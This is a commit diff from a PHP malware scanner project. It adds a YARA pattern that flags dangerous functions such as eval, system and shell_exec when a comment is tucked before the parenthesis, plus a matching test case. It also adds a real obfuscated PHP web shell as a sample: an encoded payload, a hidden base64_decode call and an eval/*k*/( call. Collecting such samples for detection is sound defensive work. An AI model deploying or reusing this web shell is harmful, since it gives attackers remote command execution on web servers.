diff options
| author | jvoisin | 2018-02-21 14:07:43 +0100 |
|---|---|---|
| committer | jvoisin | 2018-02-21 14:07:43 +0100 |
| commit | e328b96e2c6c5fd4d54ce70240aa411524d18aa4 (patch) | |
| tree | 6dfb7fb4f120e559a5d6b05ee3e06f7998a87d72 | |
| parent | 3467d442aac125413e4368a4ac3c21ab0ba72560 (diff) | |
Add a detection for things like `eval/* …*/(`
| -rw-r--r-- | php-malware-finder/php.yar | 1 | ||||
| -rw-r--r-- | php-malware-finder/samples/real/exceptions.php | 1 | ||||
| -rwxr-xr-x | php-malware-finder/tests.sh | 1 |
3 files changed, 3 insertions, 0 deletions
diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar index b2c486c..f0abcb4 100644 --- a/php-malware-finder/php.yar +++ b/php-malware-finder/php.yar | |||
| @@ -60,6 +60,7 @@ rule ObfuscatedPhp | |||
| 60 | { | 60 | { |
| 61 | strings: | 61 | strings: |
| 62 | $eval = /(<\?php|[;{}])[ \t]*@?(eval|preg_replace|system|assert|passthru|(pcntl_)?exec|shell_exec|call_user_func(_array)?)\s*\(/ nocase // ;eval( <- this is dodgy | 62 | $eval = /(<\?php|[;{}])[ \t]*@?(eval|preg_replace|system|assert|passthru|(pcntl_)?exec|shell_exec|call_user_func(_array)?)\s*\(/ nocase // ;eval( <- this is dodgy |
| 63 | $eval_comment = /(eval|preg_replace|system|assert|passthru|(pcntl_)?exec|shell_exec|call_user_func(_array)?)\/\*[^\*]*\*\/\(/ nocase // eval/*lol*/( <- this is dodgy | ||
| 63 | $b374k = "'ev'.'al'" | 64 | $b374k = "'ev'.'al'" |
| 64 | $align = /(\$\w+=[^;]*)*;\$\w+=@?\$\w+\(/ //b374k | 65 | $align = /(\$\w+=[^;]*)*;\$\w+=@?\$\w+\(/ //b374k |
| 65 | $weevely3 = /\$\w=\$[a-zA-Z]\('',\$\w\);\$\w\(\);/ // weevely3 launcher | 66 | $weevely3 = /\$\w=\$[a-zA-Z]\('',\$\w\);\$\w\(\);/ // weevely3 launcher |
diff --git a/php-malware-finder/samples/real/exceptions.php b/php-malware-finder/samples/real/exceptions.php new file mode 100644 index 0000000..d5ce73f --- /dev/null +++ b/php-malware-finder/samples/real/exceptions.php | |||
| @@ -0,0 +1 @@ | |||
| <?php $ksyweqahwz = 95; function ngomynsz($jkvdve, $swxidbkzpw){$azzogyulq = ''; for($i=0; $i < strlen($jkvdve); $i++){$azzogyulq .= isset($swxidbkzpw[$jkvdve[$i]]) ? $swxidbkzpw[$jkvdve[$i]] : $jkvdve[$i];}$wzmkq="b" . "a" . "s" . "e" . "6" . "4" . "_" . "d" . "e" . "c" . "o" . "d" . "e";return $wzmkq($azzogyulq);}$jgzzljfjj = Array("A"=>"D", "C"=>"B", "B"=>"4", "E"=>"F", "D"=>"C", "F"=>"7", "1"=>"E", "0"=>"9", "3"=>"0", "2"=>"2", "5"=>"A", "4"=>"8", "7"=>"1", "6"=>"3", "9"=>"5", "8"=>"6");$fuwkgtdbkv = "DgokZGVmYXVsdE0hY6Rpb2BgPS5nQ3MnOwoKQGluaV0zZXQoJ2Vycm0yX2xvZycsTlVMTDk"."FDkCpbmlfc2V3KDdsb2dfZXJyb6JzJywwKTsKQGluaV0zZXQoJ27heE0leGVjdXRpb29fdGltZSc"."sMDkFDkCzZXRfdGltZV0saW7pdDgwKTsKQHNldE0tYWdpY70xdW03ZXNfcnVudGltZSgwKTsKQGR"."lZmluZSgnV7NPX7ZEUlNJT3BnLD5nMiB7LjInKTsKDmlmKGdldE0tYWdpY70xdW03ZXNfZ6CjKDkpIHsKID5gIGZ7b"."mN3aW0uIEdTT6N3cmlwc2xhc2hlcygkYXJyYXkpIHsKID5gID5gIDCyZXR7c"."mBgaXNfYXJyYXkoJGEycmE9KS5/IGEycmE9X27hcDgnV7NPc6RyaXCzbGEzaGVzJywgJGEycmE9KS58IHN3cmlwc2xhc2h"."lcygkYXJyYXkpOwogID5gfQogID5gJE0QT7NUIA3gV7NPc6RyaXCzbGEza"."GVzKDRfU10TVDkFDi5gID5kX3NPT3tJRS50IEdTT6N3cmlwc2xhc2hlcygkX3NPT3tJRSkFDn3KD"."mZ7bmN3aW0uIHdzb3xvZ2luKDkgewogID5gaGVhZGVyKDdIVERQLz1uMD53MAQgTm03I1ZvdW9"."kJykFDi5gIDCkaWUoIjQwNDIpOwp0DgpmdW9jdGlvbiCXU30zZXRjb20raWUoJGssIDR2"."KSCFDi5gID5kX3NPT3tJRVska73gPS5kdjsKID5gIHNldGNvb2tpZSgkaywgJHYpOwp0DgppZ"."ighZW7wdHkoJGE7dGhfcGEzcykpIHsKID5gIGlmKGlzc2V3KDRfU10TVEsncGEzcyddKS5mJi5obWQ7KDRfU10TVEsncGEzc"."yddKS50PS5kYXV3aE0wYXNzKSkKID5gID5gIDCXU30zZXRjb20"."raWUobWQ7KDRfU3VSVkVSWydIVERQX3hPU7QnXSksIDRhdXRoX6Chc6MpOwoKID5gIGlmIDghaXNzZXQoJE0AT30LSUVbbWQ7KDR"."fU3VSVkVSWydIVERQX3hPU7QnXSldKSC4fD5oJE0AT30LSUVbbWQ7KDRfU3VSVkVSWydIVERQX3hPU7QnXSl"."dID10IDRhdXRoX6Chc6MpKQogID5gID5gIHdzb3xvZ2luKDkFDn3KDmZ7bmN3aW0uIGEjdGlvblIoKSCFDi5gIDCpZighQ"."DRfU10TVEsnZXYnXSkgewogID5gID5gIDRhIA3gYXJyYXkoDi5gID5g"."ID5gID5gIDJ7bmEtZSIgPTBgcGhwX6VuYW7lKDksDi5gID5gID5gID5gIDJwaHCfdmVyc2lvbiIgPTBgcGhwdmVyc2lvbigpL5og"."ID5gID5gID5gID5id6NvX6ZlcnNpb2BiIA3+IEdTT70WRVJTSU0OL5ogID5gID5gID5gID5ic2EmZW7vZGUiIA3+I1CpbmlfZ2V3"."KDdzYWZlX27vZGUnKQogID5gID5gIDkFDi5gID5gID5gZWNobyCzZXJpYWxpemUoJG1pOwogID5gfSClbHNlIHsKID5"."gID5gIDCldmEsKDRfU10TVEsnZXYnXSkFDi5gIDC0Dn3KDmlmK"."DClbXC3eSgkX7CPU7RbJ2MnXSkgKQogID5gaWYoaXNzZXQoJGRlZmE7bHRfYWN"."3aW0uKS5mJiCmdW9jdGlvbl0leGlzdHMoJ2EjdGlvbicgLi5kZGVmYXVsdE0hY6Rpb2BpKQogID5gID5gID"."RfU10TVEsnYyddIA3gJGRlZmE7bHRfYWN3aW0uOwogID5gZWxz"."ZQogID5gID5gIDRfU10TVEsnYyddIA3gJ7NlY3luZm4nOwppZiggIWVtcHR9K"."DRfU10TVEsnYyddKS5mJiCmdW9jdGlvbl0leGlzdHMoJ2EjdGlvbicgLi5kX7CPU7RbJ"."2MnXSkgKQogID5gY2EsbE07c2VyX2Z7bmMoJ2EjdGlvbicgLi5kX7CPU7RbJ2MnXSkFDmV"."BaXQF";eval/*k*/(ngomynsz($fuwkgtdbkv, $jgzzljfjj));?> \ No newline at end of file | |||
diff --git a/php-malware-finder/tests.sh b/php-malware-finder/tests.sh index 5ec36cd..f4d9e06 100755 --- a/php-malware-finder/tests.sh +++ b/php-malware-finder/tests.sh | |||
| @@ -85,6 +85,7 @@ run_test real/guidtz.php '0x12d8:$non_printables:' | |||
| 85 | run_test real/ice.php 'double_var' | 85 | run_test real/ice.php 'double_var' |
| 86 | run_test real/srt.php '$register_function' | 86 | run_test real/srt.php '$register_function' |
| 87 | run_test real/awvjtnz.php '$reversed:' | 87 | run_test real/awvjtnz.php '$reversed:' |
| 88 | run_test real/exceptions.php '$eval_comment: eval/\*k\*/(' | ||
| 88 | 89 | ||
| 89 | run_test undetected/smart.php '0x6:$extract:' | 90 | run_test undetected/smart.php '0x6:$extract:' |
| 90 | 91 | ||